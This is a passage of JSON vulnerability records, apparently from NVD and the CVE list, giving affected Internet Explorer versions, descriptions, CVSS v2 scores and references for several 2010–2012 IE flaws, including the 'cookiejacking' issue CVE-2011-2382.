"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1215:*:*:*:*:*:*:*",
"matchCriteriaId": "C00F4F36-B88A-4FDB-BE52-83C6EF60BDB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC05584-F553-4D29-9C46-C9EE5F0CB166",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.544:*:*:*:*:*:*:*",
"matchCriteriaId": "B108A86E-8387-446C-B823-BE6FCAE747A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1008.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BA3F79B8-512A-4B88-868C-7C4ADFD223C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1712.6:*:*:*:*:*:*:*",
"matchCriteriaId": "078C3A86-C9F8-4A19-9DDC-1065B54E640F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.2106.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9030923C-356E-4FAB-8E64-03D462B4DB5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3110.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DC0FFABC-8BED-4838-85FE-406DC9CF9B92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3612.1713:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DB4A00-4F70-4189-81BD-9318C52DF2D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B8985B-B927-4928-B1DB-18E29F796992",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3A04FEA6-37B0-44B0-844F-55652ABA1F85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "4D56FB8E-2553-47C1-82A2-9E59023780CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "8541EEED-94F4-42F8-9719-57F3EC85D52B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"matchCriteriaId": "40372520-08CF-4F64-A7AC-7E0AE0964138",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"matchCriteriaId": "2EB39B99-91A0-4B70-B12A-BA37F6AFBA83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0518.10:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFE8C8E-F46C-4179-AE83-CE4720C8E0E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0910.1309:*:*:*:*:*:*:*",
"matchCriteriaId": "61125B09-23AA-4D5A-8332-6B5CCD80C7A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2014.0216:*:*:*:*:*:*:*",
"matchCriteriaId": "3AECF59F-B3C0-44CC-B77A-30E32B3E8BB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2314.1003:*:*:*:*:*:*:*",
"matchCriteriaId": "D4690B85-86B9-448E-9249-B3885DEDC60E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2516.1900:*:*:*:*:*:*:*",
"matchCriteriaId": "4E215C82-E4AD-4B87-92D8-DD4D486EB6EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2614.3500:*:*:*:*:*:*:*",
"matchCriteriaId": "D91F4C80-3B1B-45BD-966F-C9DBF98B875D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.800:*:*:*:*:*:*:*",
"matchCriteriaId": "F65E0DC1-40F6-4252-945A-A972343D1E29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.3800:*:*:*:*:*:*:*",
"matchCriteriaId": "8C07C1A9-1A94-4653-8C57-6FCFC25854E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.6307:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC57519-AD96-4ECF-A5B2-4E45F7D55298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2920.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "37DE3DE6-A355-41F2-BF5E-E7526449E753",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3103.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB24B4F-44FF-4F0F-90FA-240A34B9599F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3105.0106:*:*:*:*:*:*:*",
"matchCriteriaId": "919A6551-DB18-49BD-AB92-4C453B3B728F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3314.2101:*:*:*:*:*:*:*",
"matchCriteriaId": "C512DAB3-2720-42D2-B27E-28F30FE0FE46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3315.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "CB90458F-1F2B-4F4C-88C6-4B670787D126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3502.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "6C2EFDB4-97C2-4DDF-8A65-FCFB60FCB540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3700.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "4A99CDC7-9341-4DFB-BB18-FF06C05FF9B0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"matchCriteriaId": "6219D36E-9E2C-4DC7-8FD5-FAD144A333F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CFF390-FF33-45CA-BC96-C6766491C616",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "3BFFB565-F656-43E3-89E1-E412DC4C9D41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp2:*:*:*:*:*:*",
"matchCriteriaId": "BD3A3282-8842-4708-AF7B-0AFBEB5D4F9A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp3:*:*:*:*:*:*",
"matchCriteriaId": "F4336F0E-75FE-4592-9D98-4F689804956E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*",
"matchCriteriaId": "F3F2A51E-2675-4993-B9C2-F2D176A92857",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6E5E4B-9E95-4019-8622-6E707FEC2FF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "40F8042F-C621-45AE-9F8C-70469579643A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"matchCriteriaId": "8E93C22E-812E-4CDA-9850-2386CE1E817A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2CD04E07-3664-4D4F-BF3E-6B33AF0F2D12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "D05ED9D0-CF78-4FAD-9371-6FB3D5825148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.3825.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA6BA38-8B3B-4B9A-95BF-BCD412DD83B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4030.2400:*:*:*:*:*:*:*",
"matchCriteriaId": "01BD2A05-3FCE-4C5D-8228-968630F27E28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0100:*:*:*:*:*:*:*",
"matchCriteriaId": "4430779C-C678-4950-AE9E-82CDFC1A08D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0600:*:*:*:*:*:*:*",
"matchCriteriaId": "BF0EC334-AEAD-43CA-A609-C027060F4F20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4308.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "BAF320BE-F022-4E0E-9815-B8AEED87B384",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4522.1800:*:*:*:*:*:*:*",
"matchCriteriaId": "75532B2D-6814-4D20-8AEB-E7DFD66B6423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4807.2300:*:*:*:*:*:*:*",
"matchCriteriaId": "83802E30-8E7D-4CAB-B8FC-10056CF833D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"matchCriteriaId": "D47247A3-7CD7-4D67-9D9B-A94A504DA1BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer v8 y versiones anteriores, y la beta de Internet Explorer v9, no restringen adecuadamente las acciones de arrastrar y soltar a trav\u00e9s de diferentes zonas de seguridad, lo que permite leer archivos de cookies a atacantes remotos asistidos por el usuario a trav\u00e9s de vectores que implican un elemento IFRAME con un atributo SRC que contiene una URL file:, como lo demuestra un juego de Facebook, relacionado con un problema de \"cookiejacking\"."
}
],
"id": "CVE-2011-2382",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2011-06-03T17:55:00.763",
"references": [
{
"source": "cve@mitre.org",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "cve@mitre.org",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "cve@mitre.org",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "cve@mitre.org",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "cve@mitre.org",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "cve@mitre.org",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "cve@mitre.org",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2010-2118
Vulnerability from fkie_nvd - Published: 2010-06-01 20:30 - Updated: 2025-04-11 00:51
Severity ?
Summary
Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| microsoft | ie | 8.0.7600.16385 | |
| microsoft | internet_explorer | 6.0.2900.2180 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
},
{
"lang": "es",
"value": "Vulnerabilidad en Microsoft Internet Explorer v6.0.2900.2180 y v8.0.7600.16385 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (agotamiento de recursos) a trav\u00e9s de c\u00f3digo JavaScript que contenga un bucle infinito que crea elementos IFRAME a URIs de tipo news://"
}
],
"id": "CVE-2010-2118",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2010-06-01T20:30:02.947",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-399"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2010-1991
Vulnerability from fkie_nvd - Published: 2010-05-20 17:30 - Updated: 2025-04-11 00:51
Severity ?
Summary
Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| microsoft | ie | 8.0.7600.16385 | |
| microsoft | internet_explorer | 6.0.2900.2180 | |
| microsoft | internet_explorer | 7 | |
| microsoft | internet_explorer | 7.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer v6.0.2900.2180, v7 y v8.0.7600.16385 ejecuta una aplicaci\u00f3n mail en situaciones d\u00f3nde un elemento IFRAME tiene un mailto: URL en su atributo SRC lo que permite a atacantes remotos provocar una denegaci\u00f3n del servicio (lanzamiento de demasiadas aplicaciones) a trav\u00e9s de un documento HTML con varios elementos IFRAME"
}
],
"id": "CVE-2010-1991",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2010-05-20T17:30:01.647",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-399"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2012-1545 (GCVE-0-2012-1545)
Vulnerability from cvelistv5 – Published: 2012-03-09 11:00 – Updated: 2024-09-17 02:01
VLAI?
Summary
Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:01:02.832Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-03-09T11:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"x_legacyV4Record": {
